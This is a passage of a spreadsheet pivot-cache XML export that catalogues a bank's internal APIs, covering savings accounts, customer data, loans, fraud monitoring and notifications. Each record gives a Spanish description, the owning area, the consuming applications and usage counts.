    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="GestionConciliacionClientes/V1.0"/>
    <m/>
    <s v="PORTALCOBRANZA_AW1294001"/>
    <n v="108"/>
    <n v="33"/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-04-25T00:20:43"/>
    <s v="Gwe-Payments"/>
    <n v="106"/>
    <s v="Gwe - Payments - QR Codes Management"/>
    <n v="106"/>
    <x v="211"/>
    <s v="El api Gwe - Payments - QR Codes Management permite generar un código QR (código, no imagen) que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P). Adicionalmente se puede consultar la información de los QR generados por un comercio y la información de un QR en especí­fico.  El proveedor de este servicio es Todo1."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <s v="Todo 1"/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ Ecosistema De Pagos_AW1314001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="18810"/>
    <n v="19842"/>
    <n v="404249"/>
    <n v="597621"/>
    <n v="676318"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-16T10:18:31"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Balance Query"/>
    <n v="103"/>
    <x v="212"/>
    <s v="Esta API permite consultar el saldo disponible de una cuenta de Ahorro a La Mano"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2622"/>
    <n v="4318"/>
    <n v="10034"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-17T14:10:15"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Customer Vinculation"/>
    <n v="104"/>
    <x v="213"/>
    <s v="El API tiene como objetivo crear una cuenta de ahorros de Bancolombia Ahorro a la Mano."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="6606"/>
    <n v="7026"/>
    <n v="190904"/>
    <n v="220353"/>
    <n v="175531"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-06-25T16:26:47"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Financial Agreement Query"/>
    <n v="100"/>
    <x v="214"/>
    <s v="El API tiene como objetivo consultar los convenios que existen con Bancolombia y que se puedan usar a través de una cuenta de ahorros de Bancolombia Ahorro a la Mano."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <n v="3"/>
    <n v="6344"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-16T10:18:31"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Transactions"/>
    <n v="103"/>
    <x v="215"/>
    <s v="Esta API permite consultar los movimientos de los últimos de los 2 meses de una cuenta de Ahorro a La Mano"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="201067"/>
    <n v="196888"/>
    <n v="3711424"/>
    <n v="5769894"/>
    <n v="7026761"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-06-25T16:26:47"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Validation Payment Bill"/>
    <n v="100"/>
    <x v="216"/>
    <s v="El API tiene como objetivo validar el pago a convenios a través de una cuenta de ahorros de Bancolombia Ahorro a La Mano."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="2621"/>
    <n v="4316"/>
    <n v="4464"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-04-16T10:18:31"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Account ALM - Withdraw Cash"/>
    <n v="103"/>
    <x v="217"/>
    <s v="Esta API permite realizar el enví­o de un otp para retirar dinero de una cuenta de Bancolombia Ahorro a la Mano en un cajero "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="187473"/>
    <n v="189931"/>
    <n v="6174955"/>
    <n v="7567660"/>
    <n v="9331304"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-17T14:10:15"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Accounts ALM - Account Reissue"/>
    <n v="103"/>
    <x v="218"/>
    <s v="El API permite realizar el cambio de número de la cuenta de ahorros Bancolombia a La Mano (ALM antes conocido como Ahorro a La Mano)."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="784"/>
    <n v="769"/>
    <n v="18118"/>
    <n v="26509"/>
    <n v="33871"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-18T12:02:19"/>
    <s v="Gwe-Accounts ALM"/>
    <n v="133"/>
    <s v="Gwe-Accounts ALM - Validation NEQUI"/>
    <n v="102"/>
    <x v="219"/>
    <s v="El API consiste en validar si un cliente al momento de vincularse a una cuenta de Bancolombia Ahorro a La Mano ya posee una cuenta de ahorros de tramites simplificados en Nequi, ya que por ley, un cliente solo puede poseer una cuenta de ahorros de tramites simplificados. Si al momento de consumir el API de consulta cuenta Nequi este no responde, el cliente debe poder vincularse y posterior operaciones se encargará de realizar las investigaciones y contactar al cliente en caso de que ya posea una cuenta de ahorros de tramites simplificados."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="10589"/>
    <n v="11588"/>
    <n v="320031"/>
    <n v="571540"/>
    <n v="547180"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-05T18:34:16"/>
    <s v="Gwe-Cards Wallet"/>
    <n v="130"/>
    <s v="Gwe-Cards - Card Verification Code"/>
    <n v="112"/>
    <x v="220"/>
    <s v="Esta API Permite validar información del código CVC de tarjetas"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="196"/>
    <n v="230"/>
    <n v="4394"/>
    <n v="8177"/>
    <n v="14475"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-04-05T18:34:16"/>
    <s v="Gwe-Cards Wallet"/>
    <n v="130"/>
    <s v="Gwe-Cards - Cards Preferences"/>
    <n v="113"/>
    <x v="221"/>
    <s v="Permite definir algunas preferencias o configuraciones sobre las tarjetas gestionadas por la Billtera Movil"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="1625"/>
    <n v="1640"/>
    <n v="23994"/>
    <n v="44735"/>
    <n v="57316"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-07-28T21:00:17"/>
    <s v="Gwe-Cards Wallet"/>
    <n v="130"/>
    <s v="Gwe-Cards - Customer Cards"/>
    <n v="130"/>
    <x v="222"/>
    <s v="Permite gestionar las tarjetas de un cliente de billetera móvil en la App Personas"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="8417"/>
    <n v="8389"/>
    <n v="131128"/>
    <n v="244548"/>
    <n v="292486"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-01-08T22:11:51"/>
    <s v="Gwe-Customers"/>
    <n v="311"/>
    <s v="Gwe-Customer - Basic Information"/>
    <n v="101"/>
    <x v="223"/>
    <s v="Te ofrecemos la forma mas fácil y confiable de conocer a tu usuario con información clave y veraz en diferentes niveles de profundidad según las necesidades de tu negocio.  Todo sin necesidad que todos se llenen formularios"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <s v="RecuperarDatosCliente/V4.0"/>
    <s v="MDM"/>
    <s v="Visor Interactivo_AW1249 _x000d__x000a_ Prometeo_AW0360009 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ Aplicación Transversal de Lealtad - ATL_AW1284 _x000d__x000a_ Boton Bancolombia_AW1277001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ MUVERANG_NU0063001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ Transfiya_NU0017001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ VisorInteractivo_AW1249 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="5196"/>
    <n v="9501"/>
    <n v="376079"/>
    <n v="759234"/>
    <n v="741750"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-09-20T17:26:08"/>
    <s v="Gwe-Customers"/>
    <n v="311"/>
    <s v="Gwe-Customer - Check Control List"/>
    <n v="100"/>
    <x v="224"/>
    <s v="No tiene Descipcion"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <s v="ConsultaListasDeControl/V1.0"/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="Visor Interactivo_AW1249 _x000d__x000a_ Prometeo_AW0360009 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ Aplicación Transversal de Lealtad - ATL_AW1284 _x000d__x000a_ Boton Bancolombia_AW1277001 _x000d__x000a_ PortalSalaDeVentas_AW1258002 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ MUVERANG_NU0063001 _x000d__x000a_ MarketplaceEcosistemasPersonas_NU0035001 _x000d__x000a_ Transfiya_NU0017001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ VisorInteractivo_AW1249 _x000d__x000a_ HabitatCore_AW1281003"/>
    <n v="2684"/>
    <n v="2669"/>
    <n v="44177"/>
    <n v="71061"/>
    <n v="80816"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-06-28T14:56:44"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Birth Date Query"/>
    <n v="103"/>
    <x v="225"/>
    <s v="Esta API permite consultar la fecha de nacimiento de un cliente y la fecha de expedición de su documento de identidad. "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="403"/>
    <n v="359"/>
    <n v="9090"/>
    <n v="14490"/>
    <n v="21238"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-17T15:59:05"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Change Email"/>
    <n v="104"/>
    <x v="226"/>
    <s v="El API permite realizar el cambio de correo electrónico del cliente de la cuenta de ahorros Bancolombia a La Mano (ALM antes conocido como Ahorro a La Mano)."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="931"/>
    <n v="801"/>
    <n v="5837"/>
    <n v="9057"/>
    <n v="9398"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-06-28T14:56:44"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Customer Type Query"/>
    <n v="103"/>
    <x v="227"/>
    <s v="Esta API permite consultar si un cliente tiene cuenta Bancolombia, si tiene cuenta de ahorro a la mano, si es cliente exclusivo de ahorro a la mano, si está inscrito en el sistema de alertas y notificaciones y si fue vinculado de forma centralizada. "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="14335"/>
    <n v="15679"/>
    <n v="381637"/>
    <n v="567324"/>
    <n v="537299"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-06-28T14:56:44"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Reissue Limit Validation"/>
    <n v="103"/>
    <x v="228"/>
    <s v="Esta API permite validar si un cliente puede realizar una reexpedición de cuenta de Bancolombia Ahorro a la Mano (Cambio de número de teléfono de la cuenta ALM). "/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="7611"/>
    <n v="7403"/>
    <n v="164662"/>
    <n v="204313"/>
    <n v="226194"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-06-28T16:23:14"/>
    <s v="Gwe-Customers ALM"/>
    <n v="118"/>
    <s v="Gwe-Customer ALM - Validate Customer"/>
    <n v="105"/>
    <x v="229"/>
    <s v="El API permite realizar la validación de si un cliente se puede vincular a Ahorro a la Mano"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="52041"/>
    <n v="50097"/>
    <n v="993268"/>
    <n v="1465063"/>
    <n v="1467430"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-10-25T10:37:39"/>
    <s v="Gwe-Enrollment"/>
    <n v="101"/>
    <s v="Gwe-Enrollment Users Management"/>
    <n v="101"/>
    <x v="193"/>
    <s v="API para el manejo de enrolamiento"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <s v=""/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API Pro"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-09-04T20:20:40"/>
    <s v="Gwe-Enrollment"/>
    <n v="111"/>
    <s v="Gwe-Enrollment Users Management"/>
    <n v="111"/>
    <x v="192"/>
    <s v="API para el manejo de enrolamiento"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="APM_AW1097001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ NU0037002_VDSORQUESTADORAUTOGESTION_BACK _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="40529"/>
    <n v="48944"/>
    <n v="526150"/>
    <n v="973026"/>
    <n v="1507346"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-03-19T16:18:50"/>
    <s v="Gwe-Enrollment"/>
    <n v="112"/>
    <s v="Gwe-Enrollment Users Management"/>
    <n v="112"/>
    <x v="192"/>
    <s v="API para el manejo de enrolamiento"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VentasDigitalesSufiVehiculos_AW1097001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ EnrolamientoSufiVehiculos_AW1097001 _x000d__x000a_ MonitoreoGWEEnrollment_AW1097001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ VDSORQUESTADORAUTOGESTIONBACK_NU0037002 _x000d__x000a_ Prueba - sufi - Enrollment - PRD"/>
    <n v="83189"/>
    <n v="86211"/>
    <n v="67132"/>
    <n v="77246"/>
    <n v="106431"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-07T16:44:34"/>
    <s v="Gwe-Fraud"/>
    <n v="103"/>
    <s v="Gwe-Fraud - RSA Monitoring"/>
    <n v="103"/>
    <x v="230"/>
    <s v="El api Gwe-Fraud - RSA Monitoring permite realizar monitoreo antifraude para la autenticación y la transaccionalidad de Botón Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Boton Bancolombia_AW1277001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="47672"/>
    <n v="45731"/>
    <n v="841878"/>
    <n v="1568125"/>
    <n v="1628618"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-11-22T04:18:42"/>
    <s v="Gwe-JWK Wallet"/>
    <n v="110"/>
    <s v="Gwe-JWK - Wallet"/>
    <n v="110"/>
    <x v="231"/>
    <s v="Un JWK (JSON Web key) es una estructura de datos JSON que representa una clave criptográfica."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="8154"/>
    <n v="7637"/>
    <n v="122095"/>
    <n v="203064"/>
    <n v="226212"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-03T03:18:39"/>
    <s v="Gwe-Legal Wallet"/>
    <n v="111"/>
    <s v="Gwe-Legal - Terms and Conditions"/>
    <n v="111"/>
    <x v="232"/>
    <s v="Permite realizar operaciones relacionadas a los términos y condiciones de uso de billetera móvil en la App Personas, entre las operaciones se encuentran: - Consultar los términos y condiciones - Aceptar términos y condiciones de un usuario especí­fico - Consultar si un usuario ya aceptó los términos y condiciones"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="2901"/>
    <n v="2813"/>
    <n v="45338"/>
    <n v="82349"/>
    <n v="100872"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-07-17T15:27:25"/>
    <s v="Gwe-Loans ALM"/>
    <n v="103"/>
    <s v="Gwe-Loans ALM - Payment Loan"/>
    <n v="102"/>
    <x v="233"/>
    <s v="(Trx 0621) encargada de desembolsar el crédito de acuerdo a los parámetros fijados por el cliente y el sistema"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="761"/>
    <n v="833"/>
    <n v="9286"/>
    <n v="30141"/>
    <n v="52382"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-06-28T14:22:19"/>
    <s v="Gwe-Loans ALM"/>
    <n v="103"/>
    <s v="Gwe-Loans ALM - Payment Loan Update State"/>
    <n v="100"/>
    <x v="234"/>
    <s v="Actualiza estado de precalculado a vendido"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="204"/>
    <n v="295"/>
    <n v="4016"/>
    <n v="6321"/>
    <n v="11652"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-06-28T14:22:19"/>
    <s v="Gwe-Loans ALM"/>
    <n v="103"/>
    <s v="Gwe-Loans ALM - Pre Loan Query"/>
    <n v="100"/>
    <x v="235"/>
    <s v="El servicio Crédito a la mano tiene como finalidad ofrecer a los clientes de ahorro a la mano un prestamo con abono inmediato en su cuenta al momento de aceptarlo. Una vez que el cliente se auntentique dentro de la aplicación se dispara la una nueva transacción (Trx 0619) consulta preaprobado, esta va a integración, donde integración consume un SP (store procedure) y realizala consulta del cliente en una base de datos Oracle, la cual nos devuelve si el cliente posee una oferta de un prestamo preaprobado, si el cliente posee una oferta y la acepta se dispara la nueva transacción (Trx 0621) el desembolso del prestamo, donde a tráves de esta cosumimos un servicio expuesto por el departamento de carteras, y de manera automatica se efectuará el crédito a la cuenta del cliente, y por ultimo se dispara otra nueva transacción (Trx 0622) Actualización del preaprobado, donde se marcara en la base de datos Oracle que la oferta ya fue vendida, esta funciona bajo la misma filosofia de la consulta del preaprobado, vamos a integración y ellos a traves del SP actualizan la información del prestamo."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="810083"/>
    <n v="841425"/>
    <n v="22365500"/>
    <n v="29405581"/>
    <n v="35310545"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-09-13T16:56:05"/>
    <s v="Gwe-Notifications"/>
    <n v="105"/>
    <s v="Gwe-Notification - Send Email Basic"/>
    <n v="103"/>
    <x v="236"/>
    <s v="No tiene Descipcion"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="EnvioCorreoElectronico/V1.0"/>
    <s v="Masivia"/>
    <s v="AppNotifications_AW0360009 _x000d__x000a_ Tracking_AW1286001 _x000d__x000a_ Prometeo_AW0360009 _x000d__x000a_ PayProMerchant_AW1235001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ Boton Bancolombia_AW1277001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TPM ALM APP_AW0955001"/>
    <n v="1308"/>
    <n v="881"/>
    <n v="14105"/>
    <n v="31279"/>
    <n v="55684"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-09-13T16:56:05"/>
    <s v="Gwe-Notifications"/>
    <n v="105"/>
    <s v="Gwe-Notification - Send SMS Massive"/>
    <n v="104"/>
    <x v="237"/>
    <s v="El Api permite realizar el envio de mensajes SMS a través del proveedor de delivery Inalambria. Este servicio esté enfocado a consumidores transaccionales que realizan envío de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes."/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="EnvioSmsInalambria/V1.0"/>
    <s v="PCC - Programas Comunes Canales_SMS Inalambria_ISPCC0011"/>
    <s v="AppNotifications_AW0360009 _x000d__x000a_ Tracking_AW1286001 _x000d__x000a_ Prometeo_AW0360009 _x000d__x000a_ PayProMerchant_AW1235001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ Boton Bancolombia_AW1277001 _x000d__x000a_ GestionaNegocios_AW1302001 _x000d__x000a_ TPM ALM APP_AW0955001"/>
    <n v="396"/>
    <n v="346"/>
    <n v="7665"/>
    <n v="25591"/>
    <n v="42697"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-12-03T12:02:45"/>
    <s v="Gwe-Security ALM"/>
    <n v="1313"/>
    <s v="Gwe-OAuth - Provider for ALM"/>
    <n v="107"/>
    <x v="238"/>
    <s v="Proveedor de OAuth para ALM"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <x v="28"/>
    <s v="Productor"/>
    <s v="BALM"/>
    <m/>
    <m/>
    <m/>
    <s v="TPM ALM APP_AW0955001 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2021-06-17T23:10:49"/>
    <s v="Gwe-Security"/>
    <n v="104"/>
    <s v="Gwe-OAuth - Provider from WAS Validator Code"/>
    <n v="104"/>
    <x v="239"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="Billetera Movil _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="43"/>
    <n v="85"/>
    <n v="905"/>
    <n v="739"/>
    <n v="1022"/>
    <s v="API GWE"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2019-08-30T18:05:56"/>
    <s v="Gwe-Payments"/>
    <n v="106"/>
    <s v="Gwe-Payments - Create Recharge"/>
    <n v="100"/>
    <x v="240"/>
    <s v="Service that allows recharging different services such as Entertainment, public services, mobile telephony, TV."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Aceptación"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
